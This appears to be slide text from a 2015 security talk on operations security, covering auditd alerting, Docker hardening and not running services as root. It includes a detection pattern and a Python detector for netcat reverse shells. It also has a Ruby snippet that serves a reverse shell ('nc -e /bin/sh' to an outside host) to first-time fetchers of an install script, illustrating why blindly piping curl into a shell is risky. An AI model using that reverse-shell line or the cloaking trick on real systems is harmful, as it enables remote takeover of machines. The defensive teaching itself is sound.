▸ Recovered operations monkey at Puppet Labs.
▸ Own a lot of black t-shirts.
▸ Had 1300 accounts on his high school Linux system. (:
https://twitter.com/skullmandible/status/411281851131523072
— @benjammingh for LasCon 2015
why am I here.
▸ Things from the real world(™) & how to cope.
▸ Far far too many summaries.
▸ Wings, moonshine and dancing? (I have no idea)
▸ tiny bugs in Chrome to full sandbox escape.
▸ Egor Homakov's 5 small bugs in GitHub to full private access on GitHub.
▸ XSS to remote code execution in under an hour.
▸ Username & password from HVAC system leads to
▸ Wireshark: 322! CVEs
▸ Security Firm Bit9 Hacked, Used to Spread Malware
▸ Joxean Koret on Breaking Antivirus software
▸ Tavis from Project Zero on exploiting ESET
▸ BEST! FireEye just running Apache/PHP as root!
▸ great position for security people, who don't want to get paid.
▸ Everyone? Do I have some emails with funny cats for you to click on.
▸ Security vendors? If you have infinite money and no attackers.
▸ Attackers!
▸ Other: github/gdestuynder/Audisp-json
▸ Have cash, want a decent GUI (and more): Go use Threatstack!
▸ Write something yourself in python & golang: I keep promising to OSS this ):
2. Alert on "/bin/nc *-e /bin/sh*"
3. You will now find when someone tries to run a reverse shell!
4. Or when your ops people do fun things.
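An added example of the alert step above (not code from the talk): it rebuilds argv from auditd EXECVE records, decodes the hex-encoded arguments auditd emits for values containing whitespace, and applies the slide's glob. The sample records are constructed, and the `WIDER_PATTERNS` glob is an assumption added to show that an `sh -c` wrapped invocation slips past the literal pattern.

```python
"""Flag reverse-shell style commands in auditd EXECVE records (added example)."""
import fnmatch
import re

# auditd writes each argv element as aN="..." or, when the value contains
# whitespace or non-printables, as an unquoted hex string: aN=2F62696E...
_ARG_RE = re.compile(r'\ba(\d+)=(?:"([^"]*)"|([0-9A-Fa-f]+))')
_ID_RE = re.compile(r"msg=audit\(\d+\.\d+:(\d+)\)")

# The glob from the slide, and a wider one that also catches nc wrapped in a shell.
SLIDE_PATTERNS = ("/bin/nc *-e /bin/sh*",)
WIDER_PATTERNS = ("*/bin/nc *-e /bin/sh*",)

# Constructed sample records (not real logs): a plain reverse shell, a harmless
# port check, and the same reverse shell hidden inside `sh -c` (hex-encoded by auditd).
SAMPLE_RECORDS = [
    'type=EXECVE msg=audit(1445000000.101:201): argc=4 a0="/bin/nc" a1="-e" a2="/bin/sh" a3="10.0.0.5"',
    'type=EXECVE msg=audit(1445000000.102:202): argc=3 a0="/bin/nc" a1="-zv" a2="10.0.0.5"',
    'type=EXECVE msg=audit(1445000000.103:203): argc=3 a0="/bin/sh" a1="-c" '
    "a2=2F62696E2F6E63202D65202F62696E2F73682031302E302E302E35",
]


def execve_argv(record: str) -> list[str]:
    """Rebuild argv from an EXECVE record, decoding hex-encoded arguments."""
    args = {}
    for idx, quoted, hexval in _ARG_RE.findall(record):
        args[int(idx)] = quoted if quoted else bytes.fromhex(hexval).decode("utf-8", "replace")
    return [args[i] for i in sorted(args)]


def matches(record: str, patterns=SLIDE_PATTERNS) -> bool:
    """True if the record is an EXECVE whose joined command line matches a pattern."""
    if "type=EXECVE" not in record:
        return False
    cmdline = " ".join(execve_argv(record))
    return any(fnmatch.fnmatchcase(cmdline, p) for p in patterns)


def scan(records, patterns=SLIDE_PATTERNS) -> list[int]:
    """Return the audit event ids that should raise an alert."""
    hits = []
    for rec in records:
        m = _ID_RE.search(rec)
        if m and matches(rec, patterns):
            hits.append(int(m.group(1)))
    return hits
```

`scan(SAMPLE_RECORDS)` returns `[201]` with the slide's glob and `[201, 203]` with the wider one; feed it the EXECVE lines from audisp-json or `ausearch -m EXECVE` output.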
    # Serve the "install script": the first request from an IP gets the reverse
    # shell, every later request (e.g. someone viewing the URL to check it)
    # gets the legitimate install code. The slide shows only the body; the
    # `serve(ip)` wrapper is added here for readability, and seen_before and
    # print_install_code are defined elsewhere on the server (not shown).
    def serve(ip)
      if seen_before.include? ip
        return print_install_code()
      else
        seen_before << ip
        return 'nc -e /bin/sh root.legit.pw 2222 &'
      end
    end
▸ cost ~$6.
▸ If I can't make $6 by owning a system, I should probably stop being an attacker.
▸ @letsencrypt will soon make this free.
▸ root.
▸ No really, stop running things as root.
▸ Did I mention not running things as root.
▸ It is also not 1999. (Docker 1.8 addresses some of this, with its changes to who it runs as)
▸ --cap-drop all and --cap-add <thing> to get the minimum capabilities.
▸ Use Docker Notary
▸ Use GRSecurity (just do that anyway, if you can.)
▸ Use SELinux... I may as well ask for a pony here.
▸ Docker is ZOMG unhackable.
▸ it's just cgroups and namespacing. (just)
▸ Escapes will happen.
▸ They have a rad security team (Hi @diogomonica and @nathanmccauley)
▸ is secure, enough.
▸ network separation & segregation still works.
▸ secrets/credentials still a bigger problem.
▸ PLEASE don't just adopt it because it's new & shiny.
▸ unikernels ✨
▸ security problems. (see OAuth)
▸ Annual pen-tests don't scale, bug bounties can help.
▸ Attackers are mining any public info you have (GitHub, S3, pastebin?)
▸ No really, go check all your S3 buckets...
▸ you to stop trusting curl.
▸ Auditd is awful, but it can be fewer awful.
▸ Jenkins, you probably have to have one.
▸ but that can be okay, nay, even useful for security.
▸ Docker and security can be used in the same sentence.
▸ Understand your threat model (Apple's guide)
▸ Don't be a FireEye, stop running things as root.